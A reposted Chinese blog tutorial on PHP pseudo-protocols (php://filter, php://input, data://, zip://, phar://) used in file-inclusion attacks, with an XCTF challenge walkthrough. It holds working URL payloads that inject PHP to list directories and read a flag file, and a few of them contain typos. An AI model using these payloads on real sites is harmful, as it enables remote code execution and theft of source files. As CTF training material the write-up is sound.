本文大量转载于:https://blog.csdn.net/qq_41289254/article/details/81388343 (感谢博主)
一,php:// 访问输入输出流,有两个常用的子协议
1,php://filter 设计用来过滤筛选文件
使用方法:非php语法文件include失败,直接输出源码内容。
php://filter/resource=需要包含的文件
还有一种使用方法是:以读的形式,将需要包含的文件名转化为base64编码的方式进行读取,这样传入至include函数的文件名不会被误以为是php执行文件而执行,而是以base64编码方式显示源码
php://filter/read=convert.base64-encode/resouece=需要包含的文件
二、php://input
利用方法:将要执行的语法php代码写在post中提交,不用键与值的形式,只写代码即可
三、file:// 后跟文件目录绝对路径
file:// 与php:filter类似,访问本地文件,但是只能传入绝对路径
四、phar:// 可以查找指定压缩包内的文件
使用绝对路径与相对路径均可
五、zip:// 用法与phar类似,不过有两点要注意
1,只能传入绝对路径。
2,要用#分隔压缩包和压缩包里的内容,并且#要用url编码%23
六、data 与input 类似,都是用户可以控制传入的php代码
1,直接写入代码
data: text/plain,<?php 执行内容 ?>
2、base64编码后写入代码
data:text/plain;(注意是分号不是逗号,与前面不同)base64,编码后的php代码
注:有一点要注意的问题,base64编码后的加号和等号要手动的url编码,否则无法识别。如下图所示:
七、http协议
include中也可以传入外部链接,采用http://
关于allow_url_fopen和allow_url_include的设置和用法总结:
XCTF例题:
除去php://;使用data://伪协议的方式,首先查看根目录,打印根路径的文件有哪些
echo $_SERVER['DOCUMENT_ROOT'];
再查看根目录下有哪些文件:
http://111.200.241.244:36230/?page=data://text/plain,?page=data://text/plain,%3C?php%20print_r(scandir(%27/var/www%27));?%3E
http://111.200.241.244:36230/?page=data://text/plain,%3C?php%20$a=file_get_contents(%27fl4gisisish3r3.php%27);echo%20htmlspecialchars($a);%20?%3E
file_get_contents
file_get_contents — 将整个文件读入一个字符串
htmlspecialchars
htmlspecialchars — 将特殊字符转换为 HTML 实体输出,可获取flag
http://111.200.241.244:36230/?page=data://text/plain,%3C?php%20$a=file_get_contents(%27fl4gisisish3r3.php%27);echo%20htmlspecialchars($a);%20?%3E
